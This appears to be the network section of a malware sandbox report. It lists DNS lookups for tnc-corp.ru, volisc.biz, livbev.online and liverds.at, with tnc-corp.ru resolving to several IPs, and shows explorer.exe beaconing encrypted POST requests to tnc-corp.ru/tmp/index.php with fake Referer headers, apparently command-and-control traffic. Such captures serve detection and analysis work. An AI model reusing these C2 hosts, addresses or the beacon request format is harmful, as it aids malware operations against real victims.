                                                      Oct 24, 2024 18:41:03.453121901 CEST192.168.2.41.1.1.10x61e5Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:04.451117039 CEST192.168.2.41.1.1.10x61e5Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:05.466629982 CEST192.168.2.41.1.1.10x61e5Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:07.466615915 CEST192.168.2.41.1.1.10x61e5Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:09.685657978 CEST192.168.2.41.1.1.10x8f3bStandard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:09.702735901 CEST192.168.2.41.1.1.10x6b31Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:10.718682051 CEST192.168.2.41.1.1.10x6b31Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:11.716528893 CEST192.168.2.41.1.1.10x6b31Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:13.716519117 CEST192.168.2.41.1.1.10x6b31Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Oct 24, 2024 18:37:38.807322979 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru189.164.127.217A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807322979 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru123.213.233.131A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807322979 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru201.233.78.169A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807322979 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru220.125.3.190A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807322979 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru186.137.126.27A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807322979 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru189.61.54.32A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807322979 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru201.124.145.196A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807322979 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru186.46.236.4A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807322979 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru186.101.193.110A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807322979 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru187.204.82.117A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807343960 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru189.164.127.217A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807343960 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru123.213.233.131A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807343960 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru201.233.78.169A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807343960 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru220.125.3.190A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807343960 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru186.137.126.27A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807343960 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru189.61.54.32A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807343960 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru201.124.145.196A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807343960 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru186.46.236.4A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807343960 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru186.101.193.110A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807343960 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru187.204.82.117A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807356119 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru189.164.127.217A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807356119 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru123.213.233.131A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807356119 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru201.233.78.169A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807356119 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru220.125.3.190A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807356119 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru186.137.126.27A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807356119 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru189.61.54.32A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807356119 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru201.124.145.196A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807356119 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru186.46.236.4A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807356119 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru186.101.193.110A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:38.807356119 CEST1.1.1.1192.168.2.40x4adfNo error (0)tnc-corp.ru187.204.82.117A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:45.982157946 CEST1.1.1.1192.168.2.40x7af7Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:45.982176065 CEST1.1.1.1192.168.2.40x7af7Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:45.982188940 CEST1.1.1.1192.168.2.40x7af7Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:45.982542992 CEST1.1.1.1192.168.2.40x7af7Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:46.001085043 CEST1.1.1.1192.168.2.40x3612Name error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:52.265104055 CEST1.1.1.1192.168.2.40xb070Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:52.265126944 CEST1.1.1.1192.168.2.40xb070Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:52.265140057 CEST1.1.1.1192.168.2.40xb070Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:37:52.265301943 CEST1.1.1.1192.168.2.40xb070Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:04.717839956 CEST1.1.1.1192.168.2.40xaea2Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:04.717888117 CEST1.1.1.1192.168.2.40xaea2Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:04.717899084 CEST1.1.1.1192.168.2.40xaea2Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:04.717907906 CEST1.1.1.1192.168.2.40xaea2Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:04.793390036 CEST1.1.1.1192.168.2.40x1c4eName error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:11.105513096 CEST1.1.1.1192.168.2.40xed8aServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:11.105526924 CEST1.1.1.1192.168.2.40xed8aServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:11.105535030 CEST1.1.1.1192.168.2.40xed8aServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:11.105869055 CEST1.1.1.1192.168.2.40xed8aServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:18.460525036 CEST1.1.1.1192.168.2.40x2e23Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:20.873910904 CEST1.1.1.1192.168.2.40xda34Name error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:27.112010002 CEST1.1.1.1192.168.2.40x236Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:27.112081051 CEST1.1.1.1192.168.2.40x236Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:27.112111092 CEST1.1.1.1192.168.2.40x236Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:27.112143040 CEST1.1.1.1192.168.2.40x236Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:38.116784096 CEST1.1.1.1192.168.2.40x256bServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:40.602171898 CEST1.1.1.1192.168.2.40x6b8eName error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:46.820019007 CEST1.1.1.1192.168.2.40xd3a0Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:46.820038080 CEST1.1.1.1192.168.2.40xd3a0Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:46.820044041 CEST1.1.1.1192.168.2.40xd3a0Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:46.820339918 CEST1.1.1.1192.168.2.40xd3a0Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:58.078646898 CEST1.1.1.1192.168.2.40xe9dcServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:58.078690052 CEST1.1.1.1192.168.2.40xe9dcServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:58.078747988 CEST1.1.1.1192.168.2.40xe9dcServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:58.078775883 CEST1.1.1.1192.168.2.40xe9dcServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:58.111707926 CEST1.1.1.1192.168.2.40xf7faName error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:04.223443985 CEST1.1.1.1192.168.2.40x5143Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:04.223489046 CEST1.1.1.1192.168.2.40x5143Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:04.223519087 CEST1.1.1.1192.168.2.40x5143Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:04.223643064 CEST1.1.1.1192.168.2.40x5143Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609256029 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru201.124.145.196A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609256029 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru186.46.236.4A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609256029 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru186.101.193.110A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609256029 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru187.204.82.117A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609256029 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru189.164.127.217A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609256029 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru123.213.233.131A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609256029 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru201.233.78.169A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609256029 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru220.125.3.190A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609256029 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru186.137.126.27A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609256029 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru189.61.54.32A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609308958 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru201.124.145.196A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609308958 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru186.46.236.4A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609308958 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru186.101.193.110A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609308958 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru187.204.82.117A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609308958 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru189.164.127.217A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609308958 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru123.213.233.131A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609308958 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru201.233.78.169A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609308958 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru220.125.3.190A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609308958 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru186.137.126.27A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609308958 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru189.61.54.32A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609339952 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru201.124.145.196A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609339952 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru186.46.236.4A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609339952 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru186.101.193.110A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609339952 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru187.204.82.117A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609339952 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru189.164.127.217A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609339952 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru123.213.233.131A (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 24, 2024 18:40:11.609339952 CEST | 1.1.1.1 | 192.168.2.4 | 0xaf62 | No error (0) | tnc-corp.ru | | 201.233.78.169 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:11.609339952 CEST | 1.1.1.1 | 192.168.2.4 | 0xaf62 | No error (0) | tnc-corp.ru | | 220.125.3.190 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:11.609339952 CEST | 1.1.1.1 | 192.168.2.4 | 0xaf62 | No error (0) | tnc-corp.ru | | 186.137.126.27 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:11.609339952 CEST | 1.1.1.1 | 192.168.2.4 | 0xaf62 | No error (0) | tnc-corp.ru | | 189.61.54.32 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:18.584759951 CEST | 1.1.1.1 | 192.168.2.4 | 0xed1f | Server failure (2) | volisc.biz | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:18.584814072 CEST | 1.1.1.1 | 192.168.2.4 | 0xed1f | Server failure (2) | volisc.biz | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:18.584844112 CEST | 1.1.1.1 | 192.168.2.4 | 0xed1f | Server failure (2) | volisc.biz | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:18.584871054 CEST | 1.1.1.1 | 192.168.2.4 | 0xed1f | Server failure (2) | volisc.biz | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:18.607841015 CEST | 1.1.1.1 | 192.168.2.4 | 0x647d | Name error (3) | livbev.online | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:22.690511942 CEST | 1.1.1.1 | 192.168.2.4 | 0x4f05 | Server failure (2) | liverds.at | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:22.690557003 CEST | 1.1.1.1 | 192.168.2.4 | 0x4f05 | Server failure (2) | liverds.at | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:22.690587997 CEST | 1.1.1.1 | 192.168.2.4 | 0x4f05 | Server failure (2) | liverds.at | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:22.690624952 CEST | 1.1.1.1 | 192.168.2.4 | 0x4f05 | Server failure (2) | liverds.at | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:33.543411016 CEST | 1.1.1.1 | 192.168.2.4 | 0xa3 | Server failure (2) | volisc.biz | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:33.543457985 CEST | 1.1.1.1 | 192.168.2.4 | 0xa3 | Server failure (2) | volisc.biz | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:33.543488026 CEST | 1.1.1.1 | 192.168.2.4 | 0xa3 | Server failure (2) | volisc.biz | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:33.543524027 CEST | 1.1.1.1 | 192.168.2.4 | 0xa3 | Server failure (2) | volisc.biz | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:33.558007956 CEST | 1.1.1.1 | 192.168.2.4 | 0xa1c4 | Name error (3) | livbev.online | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:39.825125933 CEST | 1.1.1.1 | 192.168.2.4 | 0x6fb9 | Server failure (2) | liverds.at | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:39.825176001 CEST | 1.1.1.1 | 192.168.2.4 | 0x6fb9 | Server failure (2) | liverds.at | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:39.825206041 CEST | 1.1.1.1 | 192.168.2.4 | 0x6fb9 | Server failure (2) | liverds.at | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:39.825730085 CEST | 1.1.1.1 | 192.168.2.4 | 0x6fb9 | Server failure (2) | liverds.at | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:51.966073036 CEST | 1.1.1.1 | 192.168.2.4 | 0x5737 | Server failure (2) | volisc.biz | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:51.966123104 CEST | 1.1.1.1 | 192.168.2.4 | 0x5737 | Server failure (2) | volisc.biz | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:51.966160059 CEST | 1.1.1.1 | 192.168.2.4 | 0x5737 | Server failure (2) | volisc.biz | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:51.966187954 CEST | 1.1.1.1 | 192.168.2.4 | 0x5737 | Server failure (2) | volisc.biz | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:51.989211082 CEST | 1.1.1.1 | 192.168.2.4 | 0xc66d | Name error (3) | livbev.online | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:58.242844105 CEST | 1.1.1.1 | 192.168.2.4 | 0x1c4b | Server failure (2) | liverds.at | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:58.242886066 CEST | 1.1.1.1 | 192.168.2.4 | 0x1c4b | Server failure (2) | liverds.at | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:58.242913961 CEST | 1.1.1.1 | 192.168.2.4 | 0x1c4b | Server failure (2) | liverds.at | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:40:58.243598938 CEST | 1.1.1.1 | 192.168.2.4 | 0x1c4b | Server failure (2) | liverds.at | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:41:09.679297924 CEST | 1.1.1.1 | 192.168.2.4 | 0x61e5 | Server failure (2) | volisc.biz | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:41:09.679366112 CEST | 1.1.1.1 | 192.168.2.4 | 0x61e5 | Server failure (2) | volisc.biz | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:41:09.679379940 CEST | 1.1.1.1 | 192.168.2.4 | 0x61e5 | Server failure (2) | volisc.biz | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:41:09.679398060 CEST | 1.1.1.1 | 192.168.2.4 | 0x61e5 | Server failure (2) | volisc.biz | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:41:09.694380999 CEST | 1.1.1.1 | 192.168.2.4 | 0x8f3b | Name error (3) | livbev.online | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:41:16.406060934 CEST | 1.1.1.1 | 192.168.2.4 | 0x6b31 | Server failure (2) | liverds.at | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:41:16.406099081 CEST | 1.1.1.1 | 192.168.2.4 | 0x6b31 | Server failure (2) | liverds.at | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:41:16.406109095 CEST | 1.1.1.1 | 192.168.2.4 | 0x6b31 | Server failure (2) | liverds.at | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:41:16.406213045 CEST | 1.1.1.1 | 192.168.2.4 | 0x6b31 | Server failure (2) | liverds.at | none | none | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 189.164.127.217 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 18:37:38.814829111 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://tkmyedfqjdrh.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 344
Host: tnc-corp.ru
Oct 24, 2024 18:37:38.814851046 CEST | 344 | OUT | Data Raw: 3b 6e 24 12 f7 bc 1b 52 a9 d9 c0 77 0f 01 7a b9 7d 0f b9 e7 1f 74 90 15 0b 7e 7b e1 41 c5 c6 1d 98 2a ce 2a 02 19 52 11 ee ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 42 40 e9 86
Data Ascii: ;n$Rwz}t~{A**R? 9Yt M@NA .[k,vuB@:Nzob7d*uK00B5\'&ABW+oGb&g^i=`?w2` jItUod"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 50003 | 189.164.127.217 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 18:38:57.708359957 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://kvrakpmwnkdw.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 128
Host: tnc-corp.ru
Oct 24, 2024 18:38:57.708403111 CEST | 128 | OUT | Data Raw: 3b 6e 24 12 f7 bc 1b 52 a9 d9 c0 77 0f 01 7a b9 7d 0f b9 e7 1f 74 90 15 0b 7e 7b e1 41 c5 c6 1d 98 2a ce 2a 02 19 52 11 ee ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 74 0b e4 ec
Data Ascii: ;n$Rwz}t~{A**R? 9Yt M@NA .[k,vut]/_mpUf`kNg<wp8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 50004 | 189.164.127.217 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 18:39:11.298638105 CEST | 284 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://krorrwetybapxgs.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 362
Host: tnc-corp.ru
Oct 24, 2024 18:39:11.298665047 CEST | 362 | OUT | Data Raw: 3b 6e 24 12 f7 bc 1b 52 a9 d9 c0 77 0f 01 7a b9 7d 0f b9 e7 1f 74 90 15 0b 7e 7b e1 41 c5 c6 1d 98 2a ce 2a 02 19 52 11 ee ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5a 46 cd 8d
Data Ascii: ;n$Rwz}t~{A**R? 9Yt M@NA .[k,vuZFbdasCUNF-3|9}8@EDJBLlmF-Pam<HJY],@_vW7!i&a[1h|gX[7


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 53258 | 189.164.127.217 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 18:39:31.057832003 CEST | 285 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nhvxjbuepegldhgi.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 129
Host: tnc-corp.ru
Oct 24, 2024 18:39:31.057862043 CEST | 129 | OUT | Data Raw: 3b 6e 24 12 f7 bc 1b 52 a9 d9 c0 77 0f 01 7a b9 7d 0f b9 e7 1f 74 90 15 0b 7e 7b e1 41 c5 c6 1d 98 2a ce 2a 02 19 52 11 ee ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 51 18 c7 ff
Data Ascii: ;n$Rwz}t~{A**R? 9Yt M@NA .[k,vuQ9o{`Y1jL6Wcg)Pc


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 58682 | 189.164.127.217 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 18:39:50.976933956 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fhnrrbktckg.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 187
Host: tnc-corp.ru
Oct 24, 2024 18:39:50.976965904 CEST | 187 | OUT | Data Raw: 3b 6e 24 12 f7 bc 1b 52 a9 d9 c0 77 0f 01 7a b9 7d 0f b9 e7 1f 74 90 15 0b 7e 7b e1 41 c5 c6 1d 98 2a ce 2a 02 19 52 11 ee ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2b 43 bf ea
